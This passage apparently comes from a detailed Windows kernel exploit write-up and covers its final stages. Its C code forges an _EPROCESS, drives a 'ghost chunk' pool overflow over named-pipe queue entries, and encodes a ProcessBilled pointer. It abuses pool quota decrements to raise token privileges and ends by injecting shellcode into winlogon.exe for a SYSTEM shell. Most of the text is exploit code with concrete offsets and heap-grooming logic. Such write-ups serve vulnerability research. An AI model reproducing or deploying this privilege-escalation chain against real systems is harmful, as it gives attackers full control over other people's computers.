fake_eprocess_buf, FAKE_EPROCESS_SIZE); *(UINT64*)(fake_eproc_buf+0x70+off_QuotaBlock)=token_addr+0x4B; // dec1 *(UINT64*)(fake_eproc_buf+0x1070+off_QuotaBlock)=token_addr+0x44;// dec2 *(UINT64*)(fake_eproc_buf+0x2070+off_QuotaBlock)=token_addr+0x3D;// dec3 #else *(UINT64*)(fake_eproc_buf+0x70+off_QuotaBlock)= token_addr+0x40;// 0x40 Present *(UINT64*)(fake_eproc_buf+0x1070+off_QuotaBlock)= token_addr+0x48;//0x48 Enabled #endif alloc_fake_eprocess(fake_eprocess_buf, target_pipes, aar_index + 2); } The fake _EPROCESS is an exact copy from the self process by utilizing the AAR. Due to different initial values in token, we need different locations for the LPE version and the DLL version. As in the code above. To successfully free a chunk such that the QuotaBlock decrement is effective, we also need to fix the VS chunk header _HEAP_VS_CHUNK_HEADER by first leaking the VS Subsegment address VSSubSegmentAddr with find_vs_subsegment, then use fix_vs_header as we want to free the target chunk T. The previously leaked nt!RtlpHpHeapGlobals is used to derive the HeapKey for encoding the header. The actual _EPROCESS pointer being updated into ProcessBilled is encoded via encode_ep: // chunk_addr: address of the _POOL_HEADER UINT64 encode_ep(UINT64 eproc, UINT64 chunk_addr) { return eproc ^ ExpPoolQuotaCookie ^ chunk_addr; } 10. Perform decrementsWe finally invoke the decrement by first invoking the ghost chunk linear pool overflow, to update the crafted ProcessBilled encoded pointer, the correct root queue pointer target_write_queue for the current target chunk T (note that T although in the same address, but actually changes to a new block each time it is reallocated, thus with a different root queue pointer), set the PoolQuota flag for the header, and with a fixed VS chunk header. After the overflow we can free T to invoke the decrement. For stability, we need to reclaim the chunk T back immediately, also in preparation for the next decrement. This is done with rewrite_pipes and rewrite_pipes2 if a 3rd decrement is needed. Currently we use 0x200 rewrite pipes to reclaim the chunk T for reliability. Each time after the rewrite, we invoke the ghost chunk linear pool overflow again to turn T into a leak primitive to search for the correct chunk among the rewrite pipe DQE objects: rewrite_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'V', 0); // for final decrement rewrite2_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'Z', 0);// to fill rewrite_pipes rewrite3_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'A', 0);// to fill rewrite2_pipes Take the 2nd decrement for example, we first over write T so it becomes a leak primitive (marked as aar2), then use it to confirm the previous reclaim works fine then locate the new T chunk. With the handle we we can find its original root queue pointer with find_write_queue using the process handle table. Finally we invoke the linear pool overflow again using the ghost chunk to set the new ProcessBilled and mark it as dec2 so it's ready to be freed to perform the 2nd decrement. // enable the arb_read() primitive and restore the target chunk to 0x3E0 bytes *(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x10) = target_pool_hdr;// _POOL_HEADER *(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x08) = 0; // Clear ProcessBilled *(UINT8*) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3) = 0x2; // Clear Quota bit fix_vs_header((UINT64 *)(ghost_pipes->payload+0x3F0-0x30-0x20), target_page_addr + 0xbe0 - 0x20, 0x3e0); *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00)=leak_root_queue;// QE.Flink *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08)=leak_root_queue;// QE.Blink *(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10)=(UINT64)fake_pipe_queue_sub; *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20)=1; // Unbuffered -> Bufferred *(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x32726161;// Buf[]: "aar2" *(UINT32*)(ghost_pipes->payload+0x00) = 0x324C4747; // Mark: "GGL2" create_hole_at(ghost_pipes, ghost_idx); // free ghost chunk fill_hole_at(ghost_pipes, ghost_idx); // rewrite ghost chunk current_pipe_offset = 0; for (aar_index = 0; aar_index < NUM_REWRITE_PIPES; aar_index ++) { BYTE buf[0x10] = { 0 }; if (!peek_data(rewrite_pipes, aar_index, buf, 8)) exp_failed(); if ( *(UINT32*)buf != 0x56565656) { // found overwrite if not 'VVVV' aar_pipes = rewrite_pipes; _LOG(output, "[+] Rewrite chunk (aar2/dec2) at: index 0x%X, handle 0x%llX\n", aar_index, (UINT64)rewrite_pipes->writePipe[aar_index]); break; } } if (aar_index == NUM_REWRITE_PIPES) { _LOG(output, "[+] First rewrite of 0x3E0 bytes chunks failed. \n"); exp_failed(); } // find the WriteQueue of the reclaimed rewrite chunk after ghost overwrite to fix it find_write_queue(self_eprocess, rewrite_pipes->writePipe[aar_index]); *(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x00)=target_write_queue;// QE.Flink *(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x08)=target_write_queue;// QE.Blink *(UINT64 *)(ghost_pipes->payload+0x3F0-0x30-0x08)=encode_ep(fake_eprocess + 0x1000, target_page_addr + 0xbe0 - 0x10); *(UINT8 *) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3) |= 0x8; // Set Quota bit *(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x10)=0; // Clear Irp buffer *(UINT32 *)(ghost_pipes->payload+0x3F0-0x30+0x20)=0; // Unbufferred *(UINT32 *)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x32636564;// Buf[]: "dec2" *(UINT32 *)(ghost_pipes->payload+0x00)=0x32474747; // Mark: "GGG2" create_hole_at(ghost_pipes, ghost_idx); // free ghost chunk fill_hole_at(ghost_pipes, ghost_idx); // rewrite ghost chunk // perform 2nd decrement (-0x3E0) at Token + 0x48: 0x800000 - 0x3e0 = 0x7ffc20 create_hole_at(rewrite_pipes, aar_index); spray(rewrite2_pipes); Note the DQE object has to be changed to Unbuffered mode before it is freed. 11. Spawn SYSTEM shellOnce we've obtained SeDebugPrivilege, we can then inject shellcode into winlogon.exe to spawn a SYSTEM shell. References
|